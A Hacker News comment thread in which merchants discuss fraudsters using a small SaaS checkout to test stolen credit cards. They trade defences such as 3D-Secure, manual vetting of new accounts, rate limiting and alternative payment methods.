Been there. It might be competitors. It might just be fraudsters looking to see what they can get for free from that otherwise useless stash of credit card numbers they stole or got on some forum from someone who did. Once your marketing hits the radar of one of these crews they will pass your service on to each other. As a merchant you need to develop your own fraud screening techniques or pay someone to do it.
(Pardon me if I am projecting from my past startup experience to yours in all my comments.)
I am not blaming the victim. But the industry is setup so the merchant is most responsible for detecting and dealing with fraud. And that is probably objectively not a bad call. You have all kinds of ways to detect who is doing this and ways to stop this. I hate this crime with a passion and cut it down from 5000/mo to 50/month at my first startup when it blew up on us. But it is true the credit card middlemen, having externalities the risk to you, don’t then innovate incremental tools for merchants that well. I was frustrated when I received fraudulent requests there was no third party I could report my suspicions of fraud to with a confidence rating (or check against other merchants suspicions). I did many years later see a service like that but now can’t find it.
I did just now find a pretty good list of merchant anti fraud tactics which had tricks nobody told me at the time but I had to figure out myself and were pretty successful: https://support.authorize.net/knowledgebase/Knowledgearticle...
Good luck. These guys are persistent. In my case most of them were coming from poor countries where a dollar of fraud is worth a lot more of their time than yours. Until you stop them cold, they will keep coming.
What was your most successful defence to these attacks?
No OP, but I had it happen to me and adding a "3DS" card verification to the checkout flow made the problem go away. The 3DS step is where they text the customer a number they have to type in to proceed.
It's a pain for the customer so I only do it on newish accounts, repeat customers don't get bothered.
This was LONG ago so some context is less relevant now and may not apply to others, but three of a dozen of our tactics turned the tide, the last being the best, but building on the others:
1) The basics: track all information entered in the signup process and display it in a signup email to our customer service/onboarding rep, along with whether and how often each piece of info was used (or was similar) in past locked/disabled-for-fraud accounts and have a human determine via eyeball if the composite picture looked like fraud. You’ll be surprised how often a customer saying his name was Ibrahim with a phone number in Egypt had a IP in Jordan and was using a credit card belonging to Sally Jones with a zip code in Kansas. Don’t automate fraud decision. Have a human in the loop. Know your customers with a human touch up front at signup. (“Do things that don’t scale” is the more recent mantra for this approach.) But never emit info so fraudsters couldn’t game the system beyond the binary of getting enabled/disabled, and even then don’t give them immediate feedback during/post signup to run permutations quickly. Have a human vet asychronously shortly post-signup as part of customer welcome/orientation call.
2) Silently partially disable international customers so they could sign up and give us info and do certain things but not really generate expensive transactions until a customer rep called and welcomed/vetted them and checked a box unrestricting them in our admin panel. (I say silently but if they actually got to the final step of a transaction, we did give them ways to reach out to us to get activated after talking to someone (which was manned 24x7). 99+% of the time, fraudsters never called/reached out.)
3) Most subtly, reps especially offshore ones from white label partners of ours were slow to use our ways to vet their (and thus our) customers even though their management was pushing our development team for more and more technical solutions to cut fraud. It was frustrating because I could see the fraud and it was a massive chunk of our partner’s revenue (1/3rd?) shortly out of the gate with us, but since they were a white label customer of ours I/we couldn’t exactly tell their lower level rep employees to get off their butts and take the fraud seriously (when even their management wasn’t getting through), nor did I want it to continue to harm their business because it would also harm ours.
Remembering the mantra “you can’t manage what you don’t measure”, I built an admin screen that their reps (and thus their bosses) could see that showed when each recent customer signed up and when they were cleared or locked out as fraud, how many minutes were between the two and who (which rep) locked/cleared the customer and how much was spent (lost) before the account was locked. The difference was profound. Fraud from the white label partner’s customers dropped practically overnight, from $5000 a month to under $50 just by adding a report that quietly made the humans in the loop accountable. I didn’t even have to tell the partner’s people what to do. I just made the outcomes measurable and visible and the problem took care of itself. It was a profound lesson for me early in my career. I wish that exact trick had been more useful for me since, but still — very eye opening. Chargebacks were never a problem for us again.
I’ve heard that a lot of Shopify sites will have the auto credit card processing disabled for new orders. So that a real person can validate the order before hitting Stripe or whoever with it. Fraud orders are usually easy to spot by shipping addresses and you can get a good sense for it pretty quickly. It isn’t quite chicken sexing!
Maybe the hot take here is that the best way to ruin your own business is to automate credit cards?
"Fraud orders are usually easy to spot by shipping addresses"
You can find some of these by searching the shipping address and seeing if it's a freight forwarder or an obviously vacant home (listed on MLS with empty room pictures). Those kinds of shipping addresses have a pretty high fraud rates.
But, if you mean seeing that the shipping address doesn't match the billing address on the card via AVS... That's trickier, especially for B2B spaces where a business owner buys with a credit card tied to their home address, but ships to their business.
> You can find some of these by searching the shipping address and seeing if it's a freight forwarder
Am a legitimate user of a freight forwarder, this attitude makes me sad.
4 replies →
I would assume the payment provider should handle those analytics, not the vendor
1 reply →
Or maybe these processors should train an AI to find whatever pattern you are describing.
That's sort of the problem - Payment processors know that fraud is occuring, and they punish the business owner.
1 reply →
This is a cool blog. Just super short ideas as a blog post that be read in under a minute. Thanks for sharing!
After reading your comment, I went back to the website and checked out myself. You're right; thanks for pointing it out.
Like tweeting without Twitter.
Everything is better without Twitter! ;-)
Here’s a question, if Stripe or PayPal for example are processing so many transactions why can’t they see this stuff coming a mile away?
Shouldn’t it be trivial to “triangulate” the origin of a card hack / leak after like, I don’t know, three or four transactions? This whole thing seems rigged to put make small businesses liable for covering the cost of the PII failure of probably a banking institution, or a minimum a completely different small business!
Reading so many of the comments in this thread just strengthens my belief that we need large platforms to be governed like utilities, or even better, open source alternative based utilities
I know it's probably downvoted as society has sweet spot for pity, but to certain extend it's OP's fault.
As a merchant, you need to do proper anti-fraud system. Especially considering influx of orders with stolen CC. It's just necessary to avoid huge financial and reputational losses.
Don't rely on Shopify/Stripe "anti-fraud" - it's absolute garbage selling feeling of security. Proper analysis of order flow with spotting irregularities across many datapoints are needed.
Some may whine things are not fair - yes they are not, and never will be. You just need to adapt.
Let me guess, you think cloudflare is the devil, right?
This is happening because you are basically leaving your PoS system open and unattended while a scammer walks by with a wheelbarrow full of freshly stolen credit cards.
Throw a captcha on that checkout page at least for goodness sakes
Sidenote, I remember some people here wondering why websites don't explain why a transaction failed (wrong CVV, wrong AVS or Do not honor, etc...). This is what happens if you do give this kind of error through, don't put some form of rate limiting, etc.. It becomes a convenient site for scammers to test stolen credit cards and you end up being flagged by your payment provider.
Also, it's worth having a relationship with a smaller payment gateway, merchant account provider. It insulates you somewhat.
I wonder if something like Paddle, LemonSqueezy will protect you in this case.
They are the merchant in that scenario and process refunds / chargebacks. Most likely they will punish you in some way though.
Use a service like Sift, or better, ask your CC processor for 3D-Secure if possible.
I unable to log in to my paypal account, because the confirmation sms never arrives, and the only contact given is to call them. Guess I’ll never use paypal again.
I just wish there was adversarial integration on these payment apps. I'm tired of setting up new ones.
Imagine if our phones still worked liked they originally did, where you could only call other people using the carrier you are. Oh you have T-mobile? Sorry. I have AT&T, i will write you a letter.
We didn't put up with it back then, and we shouldn't put up with it now.
I’m not a crypto evangelist by any means but one thing that I like about crypto is there are no charge backs. I added coinbase and it’s not a huge amount but about 5% of sales go over this. Apple/meta/amazon pay are also some what alternatives because the payment is going through a device that can be physically stolen but harder to do fraud than a virtual credit card.
> one thing that I like about crypto is there are no charge backs.
Most consumers probably don't like that at all, though.
I view it as paying by cash, so the same type of pitfalls exist. I'm not really pushing crypto as the best payment method, just giving the OP possible alternative payment methods they could use. There is a learning curve to using crypto, which I believe reduces the potential of consumers not fully understating the risk of sending payments. Consumers who want the protections should use a credit card to get those.
Coinbase could freeze your ability to process or receive your payments for a dozen random reasons too. False sense of security there, you need self custody.
Have open source self custody merchant tools improves?
Brick and mortar gone online and Web 2.0 services seem pretty left behind for accepting crypto payment. And Web 3’s crypto natives don't care or need purchasing flows.
DAO has entered the chat.
> Big corporations with billions in profits without any real support staff….
No support staff is probably how they scaled up to billions in profits in the first place.
This is something I could see CA, NY, or the EU taking on someday with some sort of "right to digital recourse" law.
I wonder what it is that we do differently such that I never hear of these problems from natively European payment methods. E.g. the payment platform iDeal draws directly from your bank account but there is apparently no significant trade in stolen logins. What makes that not as lucrative?
Related, but not strictly the same: a week ago my IBAN (eu-wide bank account number) was used via a Paypal guest account to make payments of 580€, paying through direct debit (Lastschrift).
There is no inherent security at all. Merchants usually send you 1 cent with a 2fa code, in order to verify that you have access to the account. In my case this was not done apparently, and the scammers got their items. I was able to do something similar to a charge back, but I wonder whether the online store or PayPal will have to eat the loss.
I read about stuff like this every month, but then people (on the internet) tell me there are no uses for blockchains and they're exlusively for scams (yes, scams exists, a lot of them).
Try talking to a local (office close-ish to you) processor or acquirer. You usually need a good amount of transactions to get them interested, but they will have support, they will discuss before taking any measures etc.
Good tip, but it doesn’t even have to be a B2B attack. A sufficiently pissed off customer can order such an attack on a business that wronged them.
Or perhaps it is spammer who didn't like being played with theoretically by the author?
https://oppositeinvictus.com/how-to-mess-with-spammers-for-s...
soon kyc in every ecommerce will be standard
In many countries you have a cheap, easy to implement and fast bank to bank for online which is faster, cheaper and more secure. And as such, mostly impossible to chargeback because unless you had a gun to your head, it was you who did the transaction.
In those regions, incentivise those means; give 5% discount for paying like that. We accept those in region where they are available, we also have our IBAN for you to pay directly. Some companies prefer that as they pay all their other invoices that way.
It would be relatively easy to implement in Ireland, but I've only used it once (buying from a shop in Germany). I placed the order on their website, and they gave me an IBAN and a reference number. I did a bank transfer to that account using the reference number they gave me, and they marked the invoice as paid and shipped the product. Simple system, though I'm not sure how they monitored their bank account: it may have been manual. It would work for any company which uses IBANs, which is all SEPA companies and many more besides.
Australia has a system called POLi. This injects a popup into the checkout page of a website which allows you to log into your own bank and do a transfer from there. That works well, and seems quick and easy for the customer.
1 reply →
No need to. Just force card processor to implement 3D-Secure by default.
Use Mollie, they have great customer support.
Are there no alternative payment gateways?
[dead]
[dead]
> as a solo SaaS builder it seems harder and harder these days to have any sort of job security
This overlooks the hard work and risk undertook by the virtuous founders of Paypal and Stripe.
*SBOs love to advocate the virtues of "risk-taking" to defend exploiting others, and the opposite when they find themselves at the other end of the exploitation.